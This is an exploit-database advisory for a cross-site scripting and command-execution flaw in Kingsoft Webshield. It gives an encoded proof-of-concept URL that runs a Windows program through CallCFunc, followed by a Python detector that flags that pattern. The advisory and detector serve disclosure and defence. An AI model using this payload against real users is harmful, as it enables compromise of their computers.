Kingsoft Webshield 1.1.0.62 - Cross-Site Scripting and Remote Command Execution Vulnerability

2009-05-20T00:00:00
ID EDB-ID:33001
Type exploitdb
Reporter inking
Modified 2009-05-20T00:00:00

Description

Kingsoft Webshield 1.1.0.62 cross-site scripting and remote command execution vulnerability (CVE-2009-1786). Webapps exploit for the PHP platform.

                                        
Source: http://www.securityfocus.com/bid/35038/info

The Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.

Remote attackers may exploit this vulnerability to compromise an affected computer.

This issue affects WebShield 1.1.0.62 and prior versions. 

http://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e
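
As an added example (not part of the original advisory), the following Python check percent-decodes query parameters and flags the two markers visible in the decoded proof-of-concept above: a `javascript:` URL inside a CSS `url()` and a call to `CallCFunc`. The function names, the sample URLs and the `PLACEHOLDER` argument are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Markers visible once the page's proof-of-concept URL is percent-decoded.
SCRIPT_URL = re.compile(r"url\(\s*['\"]?\s*javascript:", re.I)
NATIVE_CALL = re.compile(r"CallCFunc\s*\(", re.I)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are also inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_url(url):
    """Return (parameter, finding) pairs for one request URL."""
    findings = []
    # parse_qsl decodes one layer; fully_decode strips any remaining layers.
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = fully_decode(raw)
        if SCRIPT_URL.search(value):
            findings.append((name, "javascript: URL inside CSS url()"))
        if NATIVE_CALL.search(value):
            findings.append((name, "call to CallCFunc"))
    return findings

def pct(text):
    """Encode every byte as %xx, the encoding style used by the URL above."""
    return "".join("%%%02x" % b for b in text.encode())

# Constructed sample requests; PLACEHOLDER stands in for the command argument.
MARKUP = "<p style=\"background:url(javascript:parent.CallCFunc('exec','PLACEHOLDER'))\">test</p>"
BASE = "http://www.example.com/index.php?html="
SAMPLE_URLS = [
    BASE + pct(MARKUP),               # single-encoded, as in the advisory
    BASE + pct(pct(MARKUP)),          # double-encoded variant
    BASE + "%3cp%3ehello%3c%2fp%3e",  # benign markup
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(inspect_url(url) or "clean")
```
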